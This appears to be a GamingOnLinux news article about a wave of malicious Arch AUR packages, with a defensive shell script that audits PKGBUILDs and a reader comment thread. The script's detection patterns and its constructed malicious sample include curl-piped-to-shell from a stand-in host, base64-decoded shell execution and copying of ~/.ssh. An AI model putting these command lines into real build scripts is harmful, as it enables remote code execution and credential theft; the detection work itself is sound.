
The security situation with the Arch Linux AUR got a lot worse

Last updated: 14 Jun 2026 at 7:40 pm UTC

Oh dear, the situation with the Arch Linux AUR has got a fair bit worse since GamingOnLinux initially covered the malicious packages.

When the initial article went up, a bit over 400 compromised packages had been identified on the Arch User Repository (AUR). That list of affected packages (source) has since grown sharply: checking again now, nearly 2,000 are noted. That is a lot of packages to be hit like this.

Later last night the attacks were reported to be continuing "with obfuscated code", and another report in the early hours of this morning noted that it had become "a little bit more elaborate". Not all of the packaging issues are as bad as the initial wave, which tried to steal credentials; some just add ridiculous messages in Russian.

The AUR developers and maintainers are clearly going to need to rethink how the service is run. While it's a wonderful idea to let anyone come along and package extra apps and such if they're missing from Arch Linux repositories, anything left open in any way is going to cause problems. Especially so now in 2026, when Linux is clearly more popular than ever: anything Linux related like this is going to become a bigger target. And with AI bots in the mix, mounting an attack like this has become far easier.

At least some level of human review is going to be needed. Otherwise, this certainly won't be the last time we see the AUR having security problems.
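Until that review exists, the check sits with the person about to run makepkg: read the PKGBUILD, and read it again whenever a package changes hands. The script below is an added example written for this page. It is not AUR, pacman or makepkg tooling and is not something the article describes; its indicator list is a heuristic of this example's own, and the two PKGBUILDs it audits are constructed samples, not real AUR packages. It flags lines that execute downloaded or decoded shell or touch secret stores in the home directory, lists every download host the file references, and reports hosts that appeared between two revisions of the same package.

```shell
#!/bin/sh
# Added example for this page: a static pre-build audit of an AUR PKGBUILD.
# This is not AUR, pacman or makepkg tooling; the indicator list and both
# sample PKGBUILDs are constructions of this example.
set -u

# Indicators a reviewer looks for in an obfuscated or credential-stealing
# build script: running downloaded or decoded shell, eval of strings, raw
# /dev/tcp sockets, inline interpreters, reads of secret stores in $HOME.
# Heuristic only: a hit means "read this line", not "this is malicious".
SUSPICIOUS_RE='(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)'
SUSPICIOUS_RE="$SUSPICIOUS_RE"'|base64[[:space:]]+(-d|--decode)'
SUSPICIOUS_RE="$SUSPICIOUS_RE"'|eval[[:space:]]+["$]|/dev/tcp/'
SUSPICIOUS_RE="$SUSPICIOUS_RE"'|python[0-9.]*[[:space:]]+-c[[:space:]]'
SUSPICIOUS_RE="$SUSPICIOUS_RE"'|\.ssh/|\.gnupg/|\.config/(google-chrome|chromium)'

# audit_pkgbuild FILE: print "line:text" for each flagged non-comment line.
audit_pkgbuild() {
    grep -n -E "$SUSPICIOUS_RE" "$1" | grep -v -E '^[0-9]+:[[:space:]]*#' || true
}

# audit_count FILE: number of flagged lines (0 means nothing to review).
audit_count() {
    audit_pkgbuild "$1" | wc -l | tr -d ' '
}

# list_hosts FILE: every host named by a URL on a non-comment line, so the
# reviewer can compare download locations with the upstream given in url=.
list_hosts() {
    grep -v -E '^[[:space:]]*#' "$1" \
        | grep -o -E '[a-z][a-z0-9+.-]*://[^ "'"'"')]+' \
        | sed -E 's#^[a-z][a-z0-9+.-]*://([^/]+).*#\1#' \
        | sort -u
}

# new_hosts OLD NEW: hosts in NEW that OLD never referenced, the first thing
# to check when a package changes hands and a "new" revision appears.
new_hosts() {
    old_list=$(mktemp)
    list_hosts "$1" > "$old_list"
    if [ -s "$old_list" ]; then
        list_hosts "$2" | grep -v -x -F -f "$old_list" || true
    else
        list_hosts "$2"
    fi
    rm -f "$old_list"
}

# Constructed samples (not real AUR packages). Sample 1 is an ordinary
# PKGBUILD that builds its upstream tarball.
SAMPLES=$(mktemp -d)
trap 'rm -rf "$SAMPLES"' EXIT
CLEAN_PKGBUILD="$SAMPLES/PKGBUILD.clean"
BAD_PKGBUILD="$SAMPLES/PKGBUILD.bad"
cat > "$CLEAN_PKGBUILD" <<'EOF'
# Maintainer: constructed sample for an audit example
pkgname=example-tool
pkgver=1.2.0
pkgrel=1
arch=('x86_64')
url="https://github.com/example-org/example-tool"
source=("$pkgname-$pkgver.tar.gz::https://github.com/example-org/example-tool/archive/v$pkgver.tar.gz")
sha256sums=('SKIP')
build() { cd "$pkgname-$pkgver" && make; }
package() { cd "$pkgname-$pkgver" && install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"; }
EOF

# Sample 2: the same package after a hypothetical adoption. It adds a second
# download host, runs decoded and downloaded shell, and copies ~/.ssh around.
cat > "$BAD_PKGBUILD" <<'EOF'
# Maintainer: constructed sample for an audit example
pkgname=example-tool
pkgver=1.2.0
pkgrel=2
arch=('x86_64')
url="https://github.com/example-org/example-tool"
source=("$pkgname-$pkgver.tar.gz::https://github.com/example-org/example-tool/archive/v$pkgver.tar.gz"
        "helper.sh::https://files.example.net/helper.sh")
sha256sums=('SKIP' 'SKIP')
prepare() { echo 'ZWNobyBoaQo=' | base64 -d | sh; }
build() { cd "$pkgname-$pkgver" && curl -s https://files.example.net/helper.sh | sh && make; }
package() { cp -r "$HOME/.ssh/" "$srcdir/"; cd "$pkgname-$pkgver" && install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"; }
EOF

# Stand-alone run: audit the adopted revision and show what changed.
printf 'Flagged lines in %s:\n' "$BAD_PKGBUILD"
audit_pkgbuild "$BAD_PKGBUILD"
printf 'Download hosts not present in the previous revision:\n'
new_hosts "$CLEAN_PKGBUILD" "$BAD_PKGBUILD"
```

Point the two functions at a freshly cloned or pulled AUR checkout before running makepkg; the host comparison is the practical form of the worry about a package suddenly getting a new maintainer, since a revision that fetches from somewhere the previous revision never did is the first thing to look at. The pattern list will produce false positives on legitimate build scripts, which is acceptable for a tool whose output is a reading list rather than a verdict.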

Article taken from GamingOnLinux.com.
About the author: I am the owner of GamingOnLinux. After discovering Linux back in the days of Mandrake in 2003, I constantly checked on the progress of Linux until Ubuntu appeared on the scene and it helped me to really love it. You can reach me easily by emailing GamingOnLinux directly. You can follow me personally on Mastodon.
47 comments (page 3/3)
seflasporin 1 day ago
Quoting Gerarderloper: So far none of my AUR packages have been touched, but I am waiting for the dreaded updates for any of them to come where suddenly a 'new' maintainer appears out of nowhere...
This only affects orphaned PKGBUILDs. If yours all have maintainers then they'll be fine.
devland 1 day ago
Quoting dibz: Wow, some easily offended folks in here

Anything that pulls source from something like github some jackass can compromise by having their keys stolen - or if they're just bored and feeling frisky.

So yes, modern development practices affect rolling distros more because they tend to use the latest and greatest all the time - which is not always great.
Again, the rolling release official repos of Arch were not affected by the AUR hack. You're confusing two very different concepts based on what I can only assume is your disdain towards that particular OS.

Rolling release distros don't just pull from git straight into their official repos and call it a day. No distro does that.

Take the XZ compromise not all that long ago, which released a new "stable" compromised version that actually made it on to user systems - y'all know the problem commit was only about a month old? That's a crazy short timeline.
The AUR hack was found and actually fixed in under two weeks so that analogy really doesn't strengthen your position.
mercster 1 day ago
While it's a wonderful idea to let anyone come along and package extra apps and such if they're missing from Arch Linux repositories
No, it's not, and never has been. Arch is a clownshow, I've been saying it for years. It became the choice for newbies because it intentionally makes installing it laborious, so they feel like they're hacking the Gibson or something. "Hey look at me, I survived installing Arch Linux." Yeah, congrats, the list of things you typed in using a guide, and that you won't remember, are pretty impressive. Maybe it's a better idea to run a "newbie" (i.e. well engineered) distro like Ubuntu or Fedora after all. ¯\_(ツ)_/¯
Slaxer 2 hours ago
Quoting mercster: Arch is a clownshow, I've been saying it for years.
Arch is only a clownshow if you don't know what you're doing, and you go into it unaware of its DIY ethos. When I was a beginner, I didn't know what I was doing. I made mistakes, and I broke my installation a few times, but I've learned, and I had fun learning. I don't even remember the last time I experienced any problems on my Arch box, and if I do run into any problems again, it's not gonna matter because I'll know how to fix it. I owe a lot of my Linux sysadmin skills to the experience I gained from using Arch.

So you downloaded a dirty package from the AUR? Now you've learned, and you won't do that again, right?

TL;DR - Arch is not a clownshow.
Jarmer 2 hours ago
Quoting mercster: Arch is a clownshow, I've been saying it for years. It became the choice for newbies because it intentionally makes installing it laborious, so they feel like they're hacking the Gibson or something. "Hey look at me, I survived installing Arch Linux." Yeah, congrats, the list of things you typed in using a guide, and that you won't remember, are pretty impressive. Maybe it's a better idea to run a "newbie" (i.e. well engineered) distro like Ubuntu or Fedora after all. ¯\_(ツ)_/¯
Wow, this is one helluva comment. I think you deserve a gold star for getting SO many things wrong all at the same time! Quite incredible really; I'm pretty impressed. Let's see, where shall we begin?

  • Arch is not a clownshow (lol who says stuff like this? I mean?)

  • Arch is not the distro of choice for newbies and never has been

  • Arch does not intentionally make installing it difficult

  • Fedora is not a newbie distro, are you confusing this with mint or something?


I'm pretty stunned by the Arch hate in this comments thread, and SO MUCH of it is just ignorant ranting that has no basis in reality. People can't seem to grasp the fact that the AUR is not in fact the distro itself, or are confused about what the AUR even is, or how Arch even functions, but still complain about it, or make up a bunch of nonsense like the above. Oof.

Quoting Jarmer: I'm pretty stunned by the Arch hate in this comments thread, and SO MUCH of it is just ignorant ranting that has no basis in reality. People can't seem to grasp the fact that the AUR is not in fact the distro itself, or are confused about what the AUR even is, or how Arch even functions, but still complain about it, or make up a bunch of nonsense like the above. Oof.
There's been some odd stuff. To the point where I feel the need to note that while Arch is not my distro and not targeted at people like me and I am not likely to consider using it, I am nonetheless aware that it serves its purposes well and there are skilled people working hard on it and the AUR is not the same as the overall distro repository.
Slaxer 1 hour ago
Quoting Jarmer:
  • Arch is not a clownshow (lol who says stuff like this? I mean?)

Just replying to a guy that said that it was? K there bud. Chill out.

Edit: Actually, I owe you an apology. I misread the quote, and thought you were replying to me. Sorry about that. I owe you a beer.

Last edited by Slaxer on 17 Jun 2026 at 8:47 pm UTC